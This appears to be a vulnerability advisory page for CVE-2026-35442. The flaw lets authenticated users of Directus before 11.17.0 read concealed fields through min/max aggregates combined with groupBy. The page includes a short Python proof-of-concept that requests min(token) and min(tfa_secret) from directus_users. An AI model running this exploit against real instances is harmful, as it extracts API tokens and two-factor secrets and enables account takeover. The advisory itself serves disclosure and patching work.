Security Vulnerability Report
中文
CVE-2026-35442 CVSS 8.1 HIGH

CVE-2026-35442

Published: 2026-04-06 22:16:23
Last Modified: 2026-04-20 16:32:37
Source: [email protected]

Description

Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. This vulnerability is fixed in 11.17.0.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:* - VULNERABLE
Directus < 11.17.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://your-directus-instance/items/directus_users" access_token = "YOUR_LOW_PRIVILEGE_TOKEN" # Token of a user with read access # Exploit payload: Using aggregate function 'min' on a concealed field (e.g., 'token') # Combined with 'groupBy' to bypass the conceal logic and expose raw values. payload = { "groupBy[]": ["id"], "fields": ["id", "min(token)", "min(tfa_secret)"] # Targeting concealed fields } headers = { "Authorization": f"Bearer {access_token}" } try: response = requests.get(target_url, headers=headers, params=payload) if response.status_code == 200: print("[+] Exploit successful! Sensitive data extracted:") print(response.json()) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35442", "sourceIdentifier": "[email protected]", "published": "2026-04-06T22:16:22.853", "lastModified": "2026-04-20T16:32:37.287", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, aggregate functions (min, max) applied to fields with the conceal special type incorrectly return raw database values instead of the masked placeholder. When combined with groupBy, any authenticated user with read access to the affected collection can extract concealed field values, including static API tokens and two-factor authentication secrets from directus_users. This vulnerability is fixed in 11.17.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:monospace:directus:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "11.17.0", "matchCriteriaId": "F2EBB337-0000-4792-940F-DAEFCFC17747"}]}]}], "references": [{"url": "https://github.com/directus/directus/security/advisories/GHSA-38hg-ww64-rrwc", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.